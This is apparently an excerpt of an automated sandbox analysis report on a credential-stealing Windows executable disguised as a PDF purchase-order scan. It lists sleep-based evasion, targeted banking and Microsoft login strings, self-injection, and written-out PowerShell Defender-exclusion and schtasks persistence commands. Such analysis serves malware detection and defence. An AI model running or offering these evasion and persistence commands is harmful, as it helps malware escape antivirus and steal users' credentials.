                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594994s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -594326s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599211Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598806Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598680Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598466Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599470
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599344
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598672
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598452
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598343
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598125
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598015
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597906
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597792
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597687
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597577
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597434
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597327
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597218
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597108
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596890
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596781
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596672
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596562
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596451
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596343
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596234
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596125
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596015
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595906
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595784
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595546
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595431
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595304
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595172
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594994
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594875
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594765
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594546
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594437
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594326
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3881029475.0000000001588000.00000004.00000020.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3880662721.0000000001068000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1459392032.0000000001621000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_05C69548 LdrInitializeThunk,8_2_05C69548
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory written: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
